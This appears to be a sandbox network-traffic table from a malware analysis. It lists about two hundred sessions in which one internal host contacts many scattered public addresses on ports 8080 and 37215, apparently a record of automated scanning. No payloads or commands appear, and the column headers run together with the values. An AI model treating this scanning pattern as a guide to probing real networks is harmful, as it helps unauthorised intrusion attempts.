                                                        26226192.168.2.2341734149.21.72.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26227192.168.2.2333028185.19.38.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26228192.168.2.2340696217.247.33.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26229192.168.2.2353632200.133.87.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26230192.168.2.2340916140.251.124.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26231192.168.2.234820625.9.240.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26232192.168.2.2351438139.18.94.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26233192.168.2.233683034.121.85.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26234192.168.2.2350580100.46.231.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26235192.168.2.2342228212.23.229.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26236192.168.2.234013085.196.180.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26237192.168.2.2357036202.72.67.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26238192.168.2.2346862121.245.99.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26239192.168.2.2347184166.151.118.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26240192.168.2.2357952132.225.209.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26241192.168.2.2351544168.75.150.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26242192.168.2.2338522128.106.75.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26243192.168.2.234365242.231.212.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26244192.168.2.233818812.115.171.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26245192.168.2.233886648.187.97.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26246192.168.2.2334662195.10.181.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26247192.168.2.233600641.239.166.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26248192.168.2.2349952197.211.24.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26249192.168.2.2334968157.34.231.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26250192.168.2.2356840157.214.54.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26251192.168.2.234793034.14.130.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26252192.168.2.235338082.204.227.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26253192.168.2.2360920208.212.77.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26254192.168.2.2356782113.110.168.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26255192.168.2.2350392101.203.73.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26256192.168.2.2336276165.141.233.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26257192.168.2.2358864204.230.61.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26258192.168.2.233455062.253.254.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26259192.168.2.2352078186.218.70.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26260192.168.2.2333658106.171.218.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26261192.168.2.2357930157.231.31.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26262192.168.2.2344192144.197.155.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26263192.168.2.233939296.152.247.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26264192.168.2.2358468204.70.32.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26265192.168.2.2354482112.185.130.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26266192.168.2.234363050.216.97.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26267192.168.2.2336170220.249.231.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26268192.168.2.2352756159.145.208.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26269192.168.2.233591691.154.224.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26270192.168.2.2352528209.7.223.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26271192.168.2.2357740157.188.74.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26272192.168.2.2352600147.215.187.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26273192.168.2.234993651.146.147.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26274192.168.2.2335920197.60.242.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26275192.168.2.235171698.49.210.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26276192.168.2.236029646.196.135.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26277192.168.2.2334190194.93.62.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26278192.168.2.235518237.223.200.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26279192.168.2.2335676178.146.183.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26280192.168.2.2337546102.207.115.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26281192.168.2.2333166199.173.225.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26282192.168.2.233743441.230.130.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26283192.168.2.2356932137.167.108.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26284192.168.2.2339054106.175.237.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26285192.168.2.234821073.104.91.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26286192.168.2.2357790134.150.231.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26287192.168.2.2358778219.11.148.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26288192.168.2.2351490118.60.182.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26289192.168.2.235730282.11.49.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26290192.168.2.2342938146.90.4.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26291192.168.2.2356774170.134.19.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26292192.168.2.233725096.142.192.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26293192.168.2.235280295.163.132.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26294192.168.2.2358764170.56.134.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26295192.168.2.2356814221.33.34.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26296192.168.2.2353770211.145.163.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26297192.168.2.2355878167.198.251.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26298192.168.2.234679493.85.233.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26299192.168.2.2340490109.235.13.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26300192.168.2.2351460201.124.25.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26301192.168.2.2337848120.65.220.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26302192.168.2.235762669.24.199.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26303192.168.2.2353802108.16.58.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26304192.168.2.234519834.127.136.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26305192.168.2.233614849.239.165.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26306192.168.2.233979843.173.62.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26307192.168.2.2344408145.124.4.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26308192.168.2.233412263.95.4.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26309192.168.2.2334988186.73.182.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26310192.168.2.2344654216.1.123.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26311192.168.2.2338752144.143.93.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26312192.168.2.234182620.116.11.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26313192.168.2.2345278221.169.32.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26314192.168.2.234625054.71.197.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26315192.168.2.2345080158.8.70.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26316192.168.2.2337764153.246.100.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26317192.168.2.235013412.127.66.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26318192.168.2.2350320136.223.85.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26319192.168.2.234906861.112.179.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26320192.168.2.234166675.62.62.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26321192.168.2.2355566175.149.159.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26322192.168.2.2338586167.144.106.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26323192.168.2.233689042.80.13.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26324192.168.2.235491672.80.100.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26325192.168.2.233891036.32.63.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26326192.168.2.2359582169.134.63.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26327192.168.2.2353364154.239.52.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26328192.168.2.235699684.104.98.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26329192.168.2.234865273.185.35.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26330192.168.2.2341516207.49.167.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26331192.168.2.235080692.72.52.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26332192.168.2.235861258.185.124.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26333192.168.2.2358402108.173.199.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26334192.168.2.2359644207.84.20.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26335192.168.2.234955679.213.41.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26336192.168.2.2351976133.26.137.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26337192.168.2.2343560163.177.70.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26338192.168.2.2345116222.161.189.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26339192.168.2.23538229.147.201.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26340192.168.2.233349478.246.44.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26341192.168.2.234784478.138.68.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26342192.168.2.2339088200.188.116.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26343192.168.2.2337692114.193.119.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26344192.168.2.2337474183.44.249.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26345192.168.2.2358396131.6.174.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26346192.168.2.2334564106.211.254.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26347192.168.2.235479812.238.80.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26348192.168.2.2346502123.24.17.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26349192.168.2.2349482105.217.14.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26350192.168.2.2360738121.0.224.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26351192.168.2.233697097.56.123.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26352192.168.2.2343610129.154.9.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26353192.168.2.2347128182.34.210.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26354192.168.2.2349586191.69.141.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26355192.168.2.2336110142.124.70.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26356192.168.2.2360316125.12.206.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26357192.168.2.235248280.194.165.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26358192.168.2.2336432142.144.162.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26359192.168.2.2350968108.42.81.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26360192.168.2.2357574106.158.177.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26361192.168.2.2359240151.242.111.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26362192.168.2.2347804158.67.0.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26363192.168.2.235001458.80.187.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26364192.168.2.233921896.55.181.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26365192.168.2.235783623.122.177.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26366192.168.2.2340486167.229.244.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26367192.168.2.235967667.152.240.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26368192.168.2.2344022218.111.64.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26369192.168.2.234648446.87.153.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26370192.168.2.235987614.107.245.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26371192.168.2.2336020197.167.187.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26372192.168.2.2336668101.126.228.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26373192.168.2.234770473.93.101.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26374192.168.2.2343680212.118.29.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26375192.168.2.235287652.14.86.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26376192.168.2.2348862144.206.166.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26377192.168.2.2339460116.251.195.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26378192.168.2.235317478.168.176.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26379192.168.2.235257265.165.56.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26380192.168.2.23355869.199.235.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26381192.168.2.2349604122.5.205.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26382192.168.2.2344896138.159.187.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26383192.168.2.2345664156.29.148.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26384192.168.2.2342292197.44.200.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26385192.168.2.235949475.51.74.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26386192.168.2.233916693.147.106.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26387192.168.2.2347434107.106.221.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26388192.168.2.2351114196.192.6.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26389192.168.2.2354304116.80.12.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26390192.168.2.2346136195.195.52.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26391192.168.2.2353170132.182.193.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26392192.168.2.235093660.115.38.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26393192.168.2.2352772149.250.233.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26394192.168.2.234635041.161.252.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26395192.168.2.235518441.172.10.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26396192.168.2.2336512157.199.62.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26397192.168.2.2354152197.19.56.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26398192.168.2.2348752157.181.62.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26399192.168.2.2353816157.169.114.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26400192.168.2.2356046168.223.239.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26401192.168.2.233450441.223.56.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26402192.168.2.2345156157.133.31.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26403192.168.2.2360904168.171.217.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26404192.168.2.2335040197.42.135.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26405192.168.2.2344878197.180.211.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26406192.168.2.2351118153.229.140.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26407192.168.2.2334074157.143.99.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26408192.168.2.2338804197.135.160.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26409192.168.2.234884441.85.92.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26410192.168.2.233708641.97.151.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26411192.168.2.2350510104.19.53.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26412192.168.2.234563841.131.245.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26413192.168.2.2346096157.139.246.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26414192.168.2.235780841.251.57.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26415192.168.2.2347710197.57.248.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26416192.168.2.2339194157.68.47.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26417192.168.2.2333960157.191.206.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26418192.168.2.2356730107.249.19.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26419192.168.2.235021641.146.140.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26420192.168.2.2333284191.219.152.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26421192.168.2.234322841.254.74.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26422192.168.2.2344198197.32.64.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26423192.168.2.2355538197.238.0.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26424192.168.2.2354890157.89.209.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26425192.168.2.2343464157.130.205.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26426192.168.2.234400641.226.145.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26427192.168.2.235932841.54.68.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26428192.168.2.2345210160.235.83.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26429192.168.2.2360408157.223.192.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26430192.168.2.235112085.117.215.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26431192.168.2.2355242157.216.49.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26432192.168.2.2333480161.118.34.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26433192.168.2.234687293.210.174.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26434192.168.2.235241841.111.131.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26435192.168.2.2342294197.2.167.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26436192.168.2.2342006197.11.45.20037215
